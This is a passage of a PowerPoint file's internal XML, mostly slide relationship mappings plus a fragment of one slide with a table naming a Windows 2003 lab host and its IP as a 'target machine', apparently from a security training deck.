    <p:sldLayoutId id="214748473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4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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2.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791.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag172.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag171.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide101.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout801.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag182.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag173.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812.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag183.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822.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag184.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831.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag186.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag185.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841.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag188.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag187.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout851.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862.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag192.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872.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag193.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882.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25.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892.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag195.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902.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag196.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout912.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag198.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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22.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932.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag199.xml"/></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941.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951.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag205.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag204.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961.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag206.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide118.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image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout97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208.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207.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8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tags" Target="../tags/tag2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991.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1001.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag212.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag211.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide122.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1011.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag222.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag213.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1022.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag223.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032.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag224.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1041.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag225.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1051.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag228.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag227.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide127.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1061.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1072.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag232.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide129.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1082.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide130.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1092.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><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image" Target="../media/image98.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag234.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide131.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1102.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag238.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag237.xml"/></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1112.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag239.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122.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag240.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1132.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag241.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1142.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag242.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide136.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1151.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137.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1161.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide138.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1171.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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jpeg"/><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jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.jpeg"/><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8.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.jpeg"/><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image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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43.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42.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag56.xml"/><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tags" Target="../tags/tag5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5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tags" Target="../tags/tag60.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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62.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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image" Target="../media/image5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42.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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52.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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62.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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72.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.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82.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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92.xml"/><Relationship Id="rId1"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02.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.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12.xml"/><Relationship Id="rId1"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22.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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32.xml"/><Relationship Id="rId1"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42.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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52.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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71.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.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81.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.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91.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag74.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag73.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01.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag75.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide52.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image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout31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77.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76.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2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3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41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag81.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide56.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout351.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag91.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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62.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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72.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag93.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381.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag95.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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391.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag97.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag96.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401.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.jpeg"/><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12.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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432.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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442.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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452.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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462.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag107.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472.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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482.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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491.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag112.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag111.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501.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511.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag118.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11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521.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag119.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide74.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image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53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121.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20.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4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5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561.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag124.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout571.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag135.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag126.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582.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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592.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag137.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601.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag139.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag138.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611.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag141.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag140.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621.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632.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag145.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642.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag147.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag146.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652.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag149.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag148.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662.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag151.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag150.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672.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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682.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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692.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag155.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag154.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702.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag157.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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12.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721.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag159.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag158.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731.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741.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag165.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag164.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751.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag166.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.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image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout761.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag168.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><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67.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image" Target="../media/image2.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7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7583170" cy="1906270"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="854710"/>
                <a:gridCol w="2935605"/>
                <a:gridCol w="1894840"/>
                <a:gridCol w="189801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Win2003R2-1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192.138.66.10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靶机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3" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="859155" y="4770120"/>
            <a:ext cx="7832725" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
